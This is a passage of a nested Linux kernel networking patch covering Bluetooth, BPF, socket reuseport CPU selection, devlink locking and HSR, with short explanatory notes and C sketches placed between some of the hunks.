++		BT_WARN("register suspend notifier failed error:%d\n", error);
+ 
+ 	queue_work(hdev->req_workqueue, &hdev->power_on);
+ 
+@@ -3985,7 +3985,7 @@ void hci_req_cmd_complete(struct hci_dev *hdev, u16 opcode, u8 status,
+ 			*req_complete_skb = bt_cb(skb)->hci.req_complete_skb;
+ 		else
+ 			*req_complete = bt_cb(skb)->hci.req_complete;
+-		kfree_skb(skb);
++		dev_kfree_skb_irq(skb);
+ 	}
+ 	spin_unlock_irqrestore(&hdev->cmd_q.lock, flags);
+ }
+diff --git a/net/bluetooth/hci_sync.c b/net/bluetooth/hci_sync.c
+index 1fc693122a47a..3a68d9bc43b8f 100644
+--- a/net/bluetooth/hci_sync.c
++++ b/net/bluetooth/hci_sync.c
+@@ -4261,7 +4261,7 @@ static int hci_read_local_pairing_opts_sync(struct hci_dev *hdev)
+ /* Get MWS transport configuration if the HCI command is supported */
+ static int hci_get_mws_transport_config_sync(struct hci_dev *hdev)
+ {
+-	if (!(hdev->commands[30] & 0x08))
++	if (!mws_transport_config_capable(hdev))
+ 		return 0;
+ 
+ 	return __hci_cmd_sync_status(hdev, HCI_OP_GET_MWS_TRANSPORT_CONFIG,
+diff --git a/net/bluetooth/lib.c b/net/bluetooth/lib.c
+index 469a0c95b6e8a..53a796ac078c3 100644
+--- a/net/bluetooth/lib.c
++++ b/net/bluetooth/lib.c
+@@ -170,7 +170,7 @@ __u8 bt_status(int err)
+ 	case -EMLINK:
+ 		return 0x09;
+ 
+-	case EALREADY:
++	case -EALREADY:
+ 		return 0x0b;
+ 
+ 	case -EBUSY:
+@@ -191,7 +191,7 @@ __u8 bt_status(int err)
+ 	case -ECONNABORTED:
+ 		return 0x16;
+ 
+-	case ELOOP:
++	case -ELOOP:
+ 		return 0x17;
+ 
+ 	case -EPROTONOSUPPORT:
+diff --git a/net/bluetooth/mgmt.c b/net/bluetooth/mgmt.c
+index a92e7e485feba..0dd30a3beb776 100644
+--- a/net/bluetooth/mgmt.c
++++ b/net/bluetooth/mgmt.c
+@@ -8859,7 +8859,7 @@ static int add_ext_adv_params(struct sock *sk, struct hci_dev *hdev,
+ 	 * extra parameters we don't know about will be ignored in this request.
+ 	 */
+ 	if (data_len < MGMT_ADD_EXT_ADV_PARAMS_MIN_SIZE)
+-		return mgmt_cmd_status(sk, hdev->id, MGMT_OP_ADD_ADVERTISING,
++		return mgmt_cmd_status(sk, hdev->id, MGMT_OP_ADD_EXT_ADV_PARAMS,
+ 				       MGMT_STATUS_INVALID_PARAMS);
+ 
+ 	flags = __le32_to_cpu(cp->flags);
+diff --git a/net/bluetooth/rfcomm/core.c b/net/bluetooth/rfcomm/core.c
+index 7324764384b67..8d6fce9005bdd 100644
+--- a/net/bluetooth/rfcomm/core.c
++++ b/net/bluetooth/rfcomm/core.c
+@@ -590,7 +590,7 @@ int rfcomm_dlc_send(struct rfcomm_dlc *d, struct sk_buff *skb)
+ 
+ 		ret = rfcomm_dlc_send_frag(d, frag);
+ 		if (ret < 0) {
+-			kfree_skb(frag);
++			dev_kfree_skb_irq(frag);
+ 			goto unlock;
+ 		}
+ 
+diff --git a/net/bpf/test_run.c b/net/bpf/test_run.c
+index fcb3e6c5e03c0..6094ef7cffcd2 100644
+--- a/net/bpf/test_run.c
++++ b/net/bpf/test_run.c
+@@ -980,9 +980,6 @@ static int convert___skb_to_skb(struct sk_buff *skb, struct __sk_buff *__skb)
+ {
+ 	struct qdisc_skb_cb *cb = (struct qdisc_skb_cb *)skb->cb;
+ 
+-	if (!skb->len)
+-		return -EINVAL;
+-
+ 	if (!__skb)
+ 		return 0;
+ 
+diff --git a/net/core/dev.c b/net/core/dev.c
+index 3be256051e99b..70e06853ba255 100644
+--- a/net/core/dev.c
++++ b/net/core/dev.c
+@@ -10379,24 +10379,16 @@ void netdev_run_todo(void)
+ void netdev_stats_to_stats64(struct rtnl_link_stats64 *stats64,
+ 			     const struct net_device_stats *netdev_stats)
+ {
+-#if BITS_PER_LONG == 64
+-	BUILD_BUG_ON(sizeof(*stats64) < sizeof(*netdev_stats));
+-	memcpy(stats64, netdev_stats, sizeof(*netdev_stats));
+-	/* zero out counters that only exist in rtnl_link_stats64 */
+-	memset((char *)stats64 + sizeof(*netdev_stats), 0,
+-	       sizeof(*stats64) - sizeof(*netdev_stats));
+-#else
+-	size_t i, n = sizeof(*netdev_stats) / sizeof(unsigned long);
+-	const unsigned long *src = (const unsigned long *)netdev_stats;
++	size_t i, n = sizeof(*netdev_stats) / sizeof(atomic_long_t);
++	const atomic_long_t *src = (atomic_long_t *)netdev_stats;
+ 	u64 *dst = (u64 *)stats64;
+ 
+ 	BUILD_BUG_ON(n > sizeof(*stats64) / sizeof(u64));
+ 	for (i = 0; i < n; i++)
+-		dst[i] = src[i];
++		dst[i] = atomic_long_read(&src[i]);
+ 	/* zero out counters that only exist in rtnl_link_stats64 */
+ 	memset((char *)stats64 + n * sizeof(u64), 0,
+ 	       sizeof(*stats64) - n * sizeof(u64));
+-#endif
+ }
+ EXPORT_SYMBOL(netdev_stats_to_stats64);
+ 
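Dropping the 64-bit memcpy() path means every counter is now read with
atomic_long_read(), which avoids load tearing while writers update the
native-word counters concurrently. A userspace approximation with C11 atomics;
the struct layouts are invented stand-ins for the BUILD_BUG_ON-checked kernel
structs, and the _Atomic cast mirrors the kernel's cast to atomic_long_t:

#include <stdatomic.h>
#include <stdint.h>
#include <string.h>

struct dev_stats   { long rx_packets, tx_packets; };
struct dev_stats64 { uint64_t rx_packets, tx_packets, rx_missed; };

static void stats_to_stats64(struct dev_stats64 *dst64,
			     struct dev_stats *src)
{
	size_t i, n = sizeof(*src) / sizeof(long);
	_Atomic long *src_w = (_Atomic long *)src;
	uint64_t *dst = (uint64_t *)dst64;

	for (i = 0; i < n; i++)
		dst[i] = atomic_load_explicit(&src_w[i],
					      memory_order_relaxed);
	/* zero the counters that exist only in the 64-bit struct */
	memset((char *)dst64 + n * sizeof(uint64_t), 0,
	       sizeof(*dst64) - n * sizeof(uint64_t));
}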
+diff --git a/net/core/devlink.c b/net/core/devlink.c
+index 89baa7c0938b9..2aa77d4b80d0a 100644
+--- a/net/core/devlink.c
++++ b/net/core/devlink.c
+@@ -1505,10 +1505,13 @@ static int devlink_nl_cmd_get_dumpit(struct sk_buff *msg,
+ 			continue;
+ 		}
+ 
++		devl_lock(devlink);
+ 		err = devlink_nl_fill(msg, devlink, DEVLINK_CMD_NEW,
+ 				      NETLINK_CB(cb->skb).portid,
+ 				      cb->nlh->nlmsg_seq, NLM_F_MULTI);
++		devl_unlock(devlink);
+ 		devlink_put(devlink);
++
+ 		if (err)
+ 			goto out;
+ 		idx++;
+@@ -11435,8 +11438,10 @@ void devl_region_destroy(struct devlink_region *region)
+ 	devl_assert_locked(devlink);
+ 
+ 	/* Free all snapshots of region */
++	mutex_lock(&region->snapshot_lock);
+ 	list_for_each_entry_safe(snapshot, ts, &region->snapshot_list, list)
+ 		devlink_region_snapshot_del(region, snapshot);
++	mutex_unlock(&region->snapshot_lock);
+ 
+ 	list_del(&region->list);
+ 	mutex_destroy(&region->snapshot_lock);
+diff --git a/net/core/filter.c b/net/core/filter.c
+index bb0136e7a8e42..a368edd9057c7 100644
+--- a/net/core/filter.c
++++ b/net/core/filter.c
+@@ -80,6 +80,7 @@
+ #include <net/tls.h>
+ #include <net/xdp.h>
+ #include <net/mptcp.h>
++#include <net/netfilter/nf_conntrack_bpf.h>
+ 
+ static const struct bpf_func_proto *
+ bpf_sk_base_func_proto(enum bpf_func_id func_id);
+@@ -2124,8 +2125,17 @@ static int __bpf_redirect_no_mac(struct sk_buff *skb, struct net_device *dev,
+ {
+ 	unsigned int mlen = skb_network_offset(skb);
+ 
++	if (unlikely(skb->len <= mlen)) {
++		kfree_skb(skb);
++		return -ERANGE;
++	}
++
+ 	if (mlen) {
+ 		__skb_pull(skb, mlen);
++		if (unlikely(!skb->len)) {
++			kfree_skb(skb);
++			return -ERANGE;
++		}
+ 
+ 		/* At ingress, the mac header has already been pulled once.
+ 		 * At egress, skb_pospull_rcsum has to be done in case that
+@@ -2145,7 +2155,7 @@ static int __bpf_redirect_common(struct sk_buff *skb, struct net_device *dev,
+ 				 u32 flags)
+ {
+ 	/* Verify that a link layer header is carried */
+-	if (unlikely(skb->mac_header >= skb->network_header)) {
++	if (unlikely(skb->mac_header >= skb->network_header || skb->len == 0)) {
+ 		kfree_skb(skb);
+ 		return -ERANGE;
+ 	}
+@@ -7983,6 +7993,19 @@ xdp_func_proto(enum bpf_func_id func_id, const struct bpf_prog *prog)
+ 	default:
+ 		return bpf_sk_base_func_proto(func_id);
+ 	}
++
++#if IS_MODULE(CONFIG_NF_CONNTRACK) && IS_ENABLED(CONFIG_DEBUG_INFO_BTF_MODULES)
++	/* The nf_conn___init type is used in the NF_CONNTRACK kfuncs. The
++	 * kfuncs are defined in two different modules, and we want to be able
++	 * to use them interchangeably with the same BTF type ID. Because modules
++	 * can't de-duplicate BTF IDs between each other, we need the type to be
++	 * referenced in the vmlinux BTF or the verifier will get confused about
++	 * the different types. So we add this dummy type reference which will
++	 * be included in vmlinux BTF, allowing both modules to refer to the
++	 * same type ID.
++	 */
++	BTF_TYPE_EMIT(struct nf_conn___init);
++#endif
+ }
+ 
+ const struct bpf_func_proto bpf_sock_map_update_proto __weak;
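BTF_TYPE_EMIT() works entirely at compile time: casting a null pointer to the
type forces the type into the translation unit's debug/BTF info without
generating any code. A self-contained sketch; the macro body mirrors the
kernel's definition and the struct is reduced to a stand-in:

#define BTF_TYPE_EMIT(type) ((void)(type *)0)

struct nf_conn___init { int placeholder; };   /* stand-in definition */

static inline void emit_types(void)
{
	/* No runtime effect; only the type reference survives into
	 * the generated type info. */
	BTF_TYPE_EMIT(struct nf_conn___init);
}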
+diff --git a/net/core/skbuff.c b/net/core/skbuff.c
+index 88fa40571d0c7..759bede0b3dd6 100644
+--- a/net/core/skbuff.c
++++ b/net/core/skbuff.c
+@@ -2416,6 +2416,9 @@ void *__pskb_pull_tail(struct sk_buff *skb, int delta)
+ 				insp = list;
+ 			} else {
+ 				/* Eaten partially. */
++				if (skb_is_gso(skb) && !list->head_frag &&
++				    skb_headlen(list))
++					skb_shinfo(skb)->gso_type |= SKB_GSO_DODGY;
+ 
+ 				if (skb_shared(list)) {
+ 					/* Sucks! We need to fork list. :-( */
+diff --git a/net/core/skmsg.c b/net/core/skmsg.c
+index e6b9ced3eda82..53d0251788aa2 100644
+--- a/net/core/skmsg.c
++++ b/net/core/skmsg.c
+@@ -886,13 +886,16 @@ int sk_psock_msg_verdict(struct sock *sk, struct sk_psock *psock,
+ 	ret = sk_psock_map_verd(ret, msg->sk_redir);
+ 	psock->apply_bytes = msg->apply_bytes;
+ 	if (ret == __SK_REDIRECT) {
+-		if (psock->sk_redir)
++		if (psock->sk_redir) {
+ 			sock_put(psock->sk_redir);
+-		psock->sk_redir = msg->sk_redir;
+-		if (!psock->sk_redir) {
++			psock->sk_redir = NULL;
++		}
++		if (!msg->sk_redir) {
+ 			ret = __SK_DROP;
+ 			goto out;
+ 		}
++		psock->redir_ingress = sk_msg_to_ingress(msg);
++		psock->sk_redir = msg->sk_redir;
+ 		sock_hold(psock->sk_redir);
+ 	}
+ out:
+diff --git a/net/core/sock.c b/net/core/sock.c
+index a3ba0358c77c0..30407b2dd2ac4 100644
+--- a/net/core/sock.c
++++ b/net/core/sock.c
+@@ -1436,7 +1436,7 @@ set_sndbuf:
+ 		break;
+ 		}
+ 	case SO_INCOMING_CPU:
+-		WRITE_ONCE(sk->sk_incoming_cpu, val);
++		reuseport_update_incoming_cpu(sk, val);
+ 		break;
+ 
+ 	case SO_CNX_ADVICE:
+diff --git a/net/core/sock_map.c b/net/core/sock_map.c
+index 81beb16ab1ebf..22fa2c5bc6ec9 100644
+--- a/net/core/sock_map.c
++++ b/net/core/sock_map.c
+@@ -349,11 +349,13 @@ static void sock_map_free(struct bpf_map *map)
+ 
+ 		sk = xchg(psk, NULL);
+ 		if (sk) {
++			sock_hold(sk);
+ 			lock_sock(sk);
+ 			rcu_read_lock();
+ 			sock_map_unref(sk, psk);
+ 			rcu_read_unlock();
+ 			release_sock(sk);
++			sock_put(sk);
+ 		}
+ 	}
+ 
+diff --git a/net/core/sock_reuseport.c b/net/core/sock_reuseport.c
+index fb90e1e00773b..5a165286e4d8e 100644
+--- a/net/core/sock_reuseport.c
++++ b/net/core/sock_reuseport.c
+@@ -37,6 +37,70 @@ void reuseport_has_conns_set(struct sock *sk)
+ }
+ EXPORT_SYMBOL(reuseport_has_conns_set);
+ 
++static void __reuseport_get_incoming_cpu(struct sock_reuseport *reuse)
++{
++	/* Paired with READ_ONCE() in reuseport_select_sock_by_hash(). */
++	WRITE_ONCE(reuse->incoming_cpu, reuse->incoming_cpu + 1);
++}
++
++static void __reuseport_put_incoming_cpu(struct sock_reuseport *reuse)
++{
++	/* Paired with READ_ONCE() in reuseport_select_sock_by_hash(). */
++	WRITE_ONCE(reuse->incoming_cpu, reuse->incoming_cpu - 1);
++}
++
++static void reuseport_get_incoming_cpu(struct sock *sk, struct sock_reuseport *reuse)
++{
++	if (sk->sk_incoming_cpu >= 0)
++		__reuseport_get_incoming_cpu(reuse);
++}
++
++static void reuseport_put_incoming_cpu(struct sock *sk, struct sock_reuseport *reuse)
++{
++	if (sk->sk_incoming_cpu >= 0)
++		__reuseport_put_incoming_cpu(reuse);
++}
++
++void reuseport_update_incoming_cpu(struct sock *sk, int val)
++{
++	struct sock_reuseport *reuse;
++	int old_sk_incoming_cpu;
++
++	if (unlikely(!rcu_access_pointer(sk->sk_reuseport_cb))) {
++		/* Paired with READ_ONCE() in sk_incoming_cpu_update()
++		 * and compute_score().
++		 */
++		WRITE_ONCE(sk->sk_incoming_cpu, val);
++		return;
++	}
++
++	spin_lock_bh(&reuseport_lock);
++
++	/* This must be done under reuseport_lock to avoid a race with
++	 * reuseport_grow(), which accesses sk->sk_incoming_cpu without
++	 * lock_sock() when detaching a shutdown()ed sk.
++	 *
++	 * Paired with READ_ONCE() in reuseport_select_sock_by_hash().
++	 */
++	old_sk_incoming_cpu = sk->sk_incoming_cpu;
++	WRITE_ONCE(sk->sk_incoming_cpu, val);
++
++	reuse = rcu_dereference_protected(sk->sk_reuseport_cb,
++					  lockdep_is_held(&reuseport_lock));
++
++	/* reuseport_grow() has detached a closed sk. */
++	if (!reuse)
++		goto out;
++
++	if (old_sk_incoming_cpu < 0 && val >= 0)
++		__reuseport_get_incoming_cpu(reuse);
++	else if (old_sk_incoming_cpu >= 0 && val < 0)
++		__reuseport_put_incoming_cpu(reuse);
++
++out:
++	spin_unlock_bh(&reuseport_lock);
++}
++
+ static int reuseport_sock_index(struct sock *sk,
+ 				const struct sock_reuseport *reuse,
+ 				bool closed)
+@@ -64,6 +128,7 @@ static void __reuseport_add_sock(struct sock *sk,
+ 	/* paired with smp_rmb() in reuseport_(select|migrate)_sock() */
+ 	smp_wmb();
+ 	reuse->num_socks++;
++	reuseport_get_incoming_cpu(sk, reuse);
+ }
+ 
+ static bool __reuseport_detach_sock(struct sock *sk,
+@@ -76,6 +141,7 @@ static bool __reuseport_detach_sock(struct sock *sk,
+ 
+ 	reuse->socks[i] = reuse->socks[reuse->num_socks - 1];
+ 	reuse->num_socks--;
++	reuseport_put_incoming_cpu(sk, reuse);
+ 
+ 	return true;
+ }
+@@ -86,6 +152,7 @@ static void __reuseport_add_closed_sock(struct sock *sk,
+ 	reuse->socks[reuse->max_socks - reuse->num_closed_socks - 1] = sk;
+ 	/* paired with READ_ONCE() in inet_csk_bind_conflict() */
+ 	WRITE_ONCE(reuse->num_closed_socks, reuse->num_closed_socks + 1);
++	reuseport_get_incoming_cpu(sk, reuse);
+ }
+ 
+ static bool __reuseport_detach_closed_sock(struct sock *sk,
+@@ -99,6 +166,7 @@ static bool __reuseport_detach_closed_sock(struct sock *sk,
+ 	reuse->socks[i] = reuse->socks[reuse->max_socks - reuse->num_closed_socks];
+ 	/* paired with READ_ONCE() in inet_csk_bind_conflict() */
+ 	WRITE_ONCE(reuse->num_closed_socks, reuse->num_closed_socks - 1);
++	reuseport_put_incoming_cpu(sk, reuse);
+ 
+ 	return true;
+ }
+@@ -166,6 +234,7 @@ int reuseport_alloc(struct sock *sk, bool bind_inany)
+ 	reuse->bind_inany = bind_inany;
+ 	reuse->socks[0] = sk;
+ 	reuse->num_socks = 1;
++	reuseport_get_incoming_cpu(sk, reuse);
+ 	rcu_assign_pointer(sk->sk_reuseport_cb, reuse);
+ 
+ out:
+@@ -209,6 +278,7 @@ static struct sock_reuseport *reuseport_grow(struct sock_reuseport *reuse)
+ 	more_reuse->reuseport_id = reuse->reuseport_id;
+ 	more_reuse->bind_inany = reuse->bind_inany;
+ 	more_reuse->has_conns = reuse->has_conns;
++	more_reuse->incoming_cpu = reuse->incoming_cpu;
+ 
+ 	memcpy(more_reuse->socks, reuse->socks,
+ 	       reuse->num_socks * sizeof(struct sock *));
+@@ -458,18 +528,32 @@ static struct sock *run_bpf_filter(struct sock_reuseport *reuse, u16 socks,
+ static struct sock *reuseport_select_sock_by_hash(struct sock_reuseport *reuse,
+ 						  u32 hash, u16 num_socks)
+ {
++	struct sock *first_valid_sk = NULL;
+ 	int i, j;
+ 
+ 	i = j = reciprocal_scale(hash, num_socks);
+-	while (reuse->socks[i]->sk_state == TCP_ESTABLISHED) {
++	do {
++		struct sock *sk = reuse->socks[i];
++
++		if (sk->sk_state != TCP_ESTABLISHED) {
++			/* Paired with WRITE_ONCE() in __reuseport_(get|put)_incoming_cpu(). */
++			if (!READ_ONCE(reuse->incoming_cpu))
++				return sk;
++
++			/* Paired with WRITE_ONCE() in reuseport_update_incoming_cpu(). */
++			if (READ_ONCE(sk->sk_incoming_cpu) == raw_smp_processor_id())
++				return sk;
++
++			if (!first_valid_sk)
++				first_valid_sk = sk;
++		}
++
+ 		i++;
+ 		if (i >= num_socks)
+ 			i = 0;
+-		if (i == j)
+-			return NULL;
+-	}
++	} while (i != j);
+ 
+-	return reuse->socks[i];
++	return first_valid_sk;
+ }
+ 
+ /**
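The rewritten loop visits every socket once starting from the hashed index,
returns immediately when no socket in the group has set SO_INCOMING_CPU or
when a socket is pinned to the running CPU, and otherwise remembers the first
usable socket as a fallback. A condensed sketch with the socket reduced to two
fields (types and helpers are illustrative):

#include <stddef.h>

struct sk_stub { int established, incoming_cpu; };

static struct sk_stub *select_by_hash(struct sk_stub **socks, int num,
				      int start, int have_incoming_cpu,
				      int this_cpu)
{
	struct sk_stub *first_valid = NULL;
	int i = start;

	do {
		struct sk_stub *s = socks[i];

		if (!s->established) {
			if (!have_incoming_cpu)
				return s;          /* fast path */
			if (s->incoming_cpu == this_cpu)
				return s;          /* pinned match */
			if (!first_valid)
				first_valid = s;   /* fallback */
		}
		if (++i >= num)
			i = 0;
	} while (i != start);

	return first_valid;                        /* may be NULL */
}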
+diff --git a/net/core/stream.c b/net/core/stream.c
+index 75fded8495f5b..516895f482356 100644
+--- a/net/core/stream.c
++++ b/net/core/stream.c
+@@ -196,6 +196,12 @@ void sk_stream_kill_queues(struct sock *sk)
+ 	/* First the read buffer. */
+ 	__skb_queue_purge(&sk->sk_receive_queue);
+ 
++	/* Next, the error queue.
++	 * We need to use the queue lock, because other threads might
++	 * add packets to the queue without the socket lock being held.
++	 */
++	skb_queue_purge(&sk->sk_error_queue);
++
+ 	/* Next, the write queue. */
+ 	WARN_ON_ONCE(!skb_queue_empty(&sk->sk_write_queue));
+ 
+diff --git a/net/dsa/tag_8021q.c b/net/dsa/tag_8021q.c
+index 34e5ec5d3e236..89371b16416e2 100644
+--- a/net/dsa/tag_8021q.c
++++ b/net/dsa/tag_8021q.c
+@@ -398,6 +398,7 @@ static void dsa_tag_8021q_teardown(struct dsa_switch *ds)
+ int dsa_tag_8021q_register(struct dsa_switch *ds, __be16 proto)
+ {
+ 	struct dsa_8021q_context *ctx;
++	int err;
+ 
+ 	ctx = kzalloc(sizeof(*ctx), GFP_KERNEL);
+ 	if (!ctx)
+@@ -410,7 +411,15 @@ int dsa_tag_8021q_register(struct dsa_switch *ds, __be16 proto)
+ 
+ 	ds->tag_8021q_ctx = ctx;
+ 
+-	return dsa_tag_8021q_setup(ds);
++	err = dsa_tag_8021q_setup(ds);
++	if (err)
++		goto err_free;
++
++	return 0;
++
++err_free:
++	kfree(ctx);
++	return err;
+ }
+ EXPORT_SYMBOL_GPL(dsa_tag_8021q_register);
+ 
+diff --git a/net/ethtool/ioctl.c b/net/ethtool/ioctl.c
+index 57e7238a4136b..81fe2422fe58a 100644
+--- a/net/ethtool/ioctl.c
++++ b/net/ethtool/ioctl.c
+@@ -2008,7 +2008,8 @@ static int ethtool_phys_id(struct net_device *dev, void __user *useraddr)
+ 	} else {
+ 		/* Driver expects to be called at twice the frequency in rc */
+ 		int n = rc * 2, interval = HZ / n;
+-		u64 count = n * id.data, i = 0;
++		u64 count = mul_u32_u32(n, id.data);
++		u64 i = 0;
+ 
+ 		do {
+ 			rtnl_lock();
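With two 32-bit operands, n * id.data is evaluated in 32 bits and can wrap
long before it is stored into the 64-bit count; mul_u32_u32() performs the
multiply at full width. The same effect in standalone C, where an explicit
cast does the widening (values chosen to overflow 32 bits):

#include <stdint.h>
#include <stdio.h>

int main(void)
{
	uint32_t n = 200, data = 50000000;        /* product > UINT32_MAX */
	uint64_t wrapped = n * data;              /* 32-bit multiply, wraps */
	uint64_t widened = (uint64_t)n * data;    /* multiply at 64 bits */

	printf("wrapped=%llu widened=%llu\n",
	       (unsigned long long)wrapped,
	       (unsigned long long)widened);
	return 0;
}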
+diff --git a/net/hsr/hsr_debugfs.c b/net/hsr/hsr_debugfs.c
+index de476a4176314..1a195efc79cd1 100644
+--- a/net/hsr/hsr_debugfs.c
++++ b/net/hsr/hsr_debugfs.c
+@@ -9,7 +9,6 @@
+ #include <linux/module.h>
+ #include <linux/errno.h>
+ #include <linux/debugfs.h>
+-#include <linux/jhash.h>
+ #include "hsr_main.h"
+ #include "hsr_framereg.h"
+ 
+@@ -21,7 +20,6 @@ hsr_node_table_show(struct seq_file *sfp, void *data)
+ {
+ 	struct hsr_priv *priv = (struct hsr_priv *)sfp->private;
+ 	struct hsr_node *node;
+-	int i;
+ 
+ 	seq_printf(sfp, "Node Table entries for (%s) device\n",
+ 		   (priv->prot_version == PRP_V1 ? "PRP" : "HSR"));
+@@ -33,28 +31,22 @@ hsr_node_table_show(struct seq_file *sfp, void *data)
+ 		seq_puts(sfp, "DAN-H\n");
+ 
+ 	rcu_read_lock();
+-
+-	for (i = 0 ; i < priv->hash_buckets; i++) {
+-		hlist_for_each_entry_rcu(node, &priv->node_db[i], mac_list) {
+-			/* skip self node */
+-			if (hsr_addr_is_self(priv, node->macaddress_A))
+-				continue;
+-			seq_printf(sfp, "%pM ", &node->macaddress_A[0]);
+-			seq_printf(sfp, "%pM ", &node->macaddress_B[0]);
+-			seq_printf(sfp, "%10lx, ",
+-				   node->time_in[HSR_PT_SLAVE_A]);
+-			seq_printf(sfp, "%10lx, ",
+-				   node->time_in[HSR_PT_SLAVE_B]);
+-			seq_printf(sfp, "%14x, ", node->addr_B_port);
+-
+-			if (priv->prot_version == PRP_V1)
+-				seq_printf(sfp, "%5x, %5x, %5x\n",
+-					   node->san_a, node->san_b,
+-					   (node->san_a == 0 &&
+-					    node->san_b == 0));
+-			else
+-				seq_printf(sfp, "%5x\n", 1);
+-		}
++	list_for_each_entry_rcu(node, &priv->node_db, mac_list) {
++		/* skip self node */
++		if (hsr_addr_is_self(priv, node->macaddress_A))
++			continue;
++		seq_printf(sfp, "%pM ", &node->macaddress_A[0]);
++		seq_printf(sfp, "%pM ", &node->macaddress_B[0]);
++		seq_printf(sfp, "%10lx, ", node->time_in[HSR_PT_SLAVE_A]);
++		seq_printf(sfp, "%10lx, ", node->time_in[HSR_PT_SLAVE_B]);
++		seq_printf(sfp, "%14x, ", node->addr_B_port);
++
++		if (priv->prot_version == PRP_V1)
++			seq_printf(sfp, "%5x, %5x, %5x\n",
++				   node->san_a, node->san_b,
++				   (node->san_a == 0 && node->san_b == 0));
++		else
++			seq_printf(sfp, "%5x\n", 1);
+ 	}
+ 	rcu_read_unlock();
+ 	return 0;
+diff --git a/net/hsr/hsr_device.c b/net/hsr/hsr_device.c
+index 6ffef47e9be55..b1e86a7265b32 100644
+--- a/net/hsr/hsr_device.c
++++ b/net/hsr/hsr_device.c
+@@ -219,7 +219,9 @@ static netdev_tx_t hsr_dev_xmit(struct sk_buff *skb, struct net_device *dev)
+ 		skb->dev = master->dev;
+ 		skb_reset_mac_header(skb);
+ 		skb_reset_mac_len(skb);
++		spin_lock_bh(&hsr->seqnr_lock);
+ 		hsr_forward_skb(skb, master);
++		spin_unlock_bh(&hsr->seqnr_lock);
+ 	} else {
+ 		dev_core_stats_tx_dropped_inc(dev);
+ 		dev_kfree_skb_any(skb);
+@@ -278,7 +280,6 @@ static void send_hsr_supervision_frame(struct hsr_port *master,
+ 	__u8 type = HSR_TLV_LIFE_CHECK;
+ 	struct hsr_sup_payload *hsr_sp;
+ 	struct hsr_sup_tag *hsr_stag;
+-	unsigned long irqflags;
+ 	struct sk_buff *skb;
+ 
+ 	*interval = msecs_to_jiffies(HSR_LIFE_CHECK_INTERVAL);
+@@ -299,7 +300,7 @@ static void send_hsr_supervision_frame(struct hsr_port *master,
+ 	set_hsr_stag_HSR_ver(hsr_stag, hsr->prot_version);
+ 
+ 	/* From HSRv1 on we have separate supervision sequence numbers. */
+-	spin_lock_irqsave(&master->hsr->seqnr_lock, irqflags);
++	spin_lock_bh(&hsr->seqnr_lock);
+ 	if (hsr->prot_version > 0) {
+ 		hsr_stag->sequence_nr = htons(hsr->sup_sequence_nr);
+ 		hsr->sup_sequence_nr++;
+@@ -307,7 +308,6 @@ static void send_hsr_supervision_frame(struct hsr_port *master,
+ 		hsr_stag->sequence_nr = htons(hsr->sequence_nr);
+ 		hsr->sequence_nr++;
+ 	}
+-	spin_unlock_irqrestore(&master->hsr->seqnr_lock, irqflags);
+ 
+ 	hsr_stag->tlv.HSR_TLV_type = type;
+ 	/* TODO: Why 12 in HSRv0? */
+@@ -318,11 +318,13 @@ static void send_hsr_supervision_frame(struct hsr_port *master,
+ 	hsr_sp = skb_put(skb, sizeof(struct hsr_sup_payload));
+ 	ether_addr_copy(hsr_sp->macaddress_A, master->dev->dev_addr);
+ 
+-	if (skb_put_padto(skb, ETH_ZLEN))
++	if (skb_put_padto(skb, ETH_ZLEN)) {
++		spin_unlock_bh(&hsr->seqnr_lock);
+ 		return;
++	}
+ 
+ 	hsr_forward_skb(skb, master);
+-
++	spin_unlock_bh(&hsr->seqnr_lock);
+ 	return;
+ }
+ 
+@@ -332,7 +334,6 @@ static void send_prp_supervision_frame(struct hsr_port *master,
+ 	struct hsr_priv *hsr = master->hsr;
+ 	struct hsr_sup_payload *hsr_sp;
+ 	struct hsr_sup_tag *hsr_stag;
+-	unsigned long irqflags;
+ 	struct sk_buff *skb;
+ 
+ 	skb = hsr_init_skb(master);
+@@ -347,7 +348,7 @@ static void send_prp_supervision_frame(struct hsr_port *master,
+ 	set_hsr_stag_HSR_ver(hsr_stag, (hsr->prot_version ? 1 : 0));
+ 
+ 	/* From HSRv1 on we have separate supervision sequence numbers. */
+-	spin_lock_irqsave(&master->hsr->seqnr_lock, irqflags);
++	spin_lock_bh(&hsr->seqnr_lock);
+ 	hsr_stag->sequence_nr = htons(hsr->sup_sequence_nr);
+ 	hsr->sup_sequence_nr++;
+ 	hsr_stag->tlv.HSR_TLV_type = PRP_TLV_LIFE_CHECK_DD;
+@@ -358,13 +359,12 @@ static void send_prp_supervision_frame(struct hsr_port *master,
+ 	ether_addr_copy(hsr_sp->macaddress_A, master->dev->dev_addr);
+ 
+ 	if (skb_put_padto(skb, ETH_ZLEN)) {
+-		spin_unlock_irqrestore(&master->hsr->seqnr_lock, irqflags);
++		spin_unlock_bh(&hsr->seqnr_lock);
+ 		return;
+ 	}
+ 
+-	spin_unlock_irqrestore(&master->hsr->seqnr_lock, irqflags);
+-
+ 	hsr_forward_skb(skb, master);
++	spin_unlock_bh(&hsr->seqnr_lock);
+ }
+ 
+ /* Announce (supervision frame) timer function
+@@ -444,7 +444,7 @@ void hsr_dev_setup(struct net_device *dev)
+ 	dev->header_ops = &hsr_header_ops;
+ 	dev->netdev_ops = &hsr_device_ops;
+ 	SET_NETDEV_DEVTYPE(dev, &hsr_type);
+-	dev->priv_flags |= IFF_NO_QUEUE;
++	dev->priv_flags |= IFF_NO_QUEUE | IFF_DISABLE_NETPOLL;
+ 
+ 	dev->needs_free_netdev = true;
+ 
+@@ -485,16 +485,12 @@ int hsr_dev_finalize(struct net_device *hsr_dev, struct net_device *slave[2],
+ {
+ 	bool unregister = false;
+ 	struct hsr_priv *hsr;
+-	int res, i;
++	int res;
+ 
+ 	hsr = netdev_priv(hsr_dev);
+ 	INIT_LIST_HEAD(&hsr->ports);
+-	INIT_HLIST_HEAD(&hsr->self_node_db);
+-	hsr->hash_buckets = HSR_HSIZE;
+-	get_random_bytes(&hsr->hash_seed, sizeof(hsr->hash_seed));
+-	for (i = 0; i < hsr->hash_buckets; i++)
+-		INIT_HLIST_HEAD(&hsr->node_db[i]);
+-
++	INIT_LIST_HEAD(&hsr->node_db);
++	INIT_LIST_HEAD(&hsr->self_node_db);
+ 	spin_lock_init(&hsr->list_lock);
+ 
+ 	eth_hw_addr_set(hsr_dev, slave[0]->dev_addr);
+diff --git a/net/hsr/hsr_forward.c b/net/hsr/hsr_forward.c
+index 56bb27d67a2ee..629daacc96071 100644
+--- a/net/hsr/hsr_forward.c
++++ b/net/hsr/hsr_forward.c
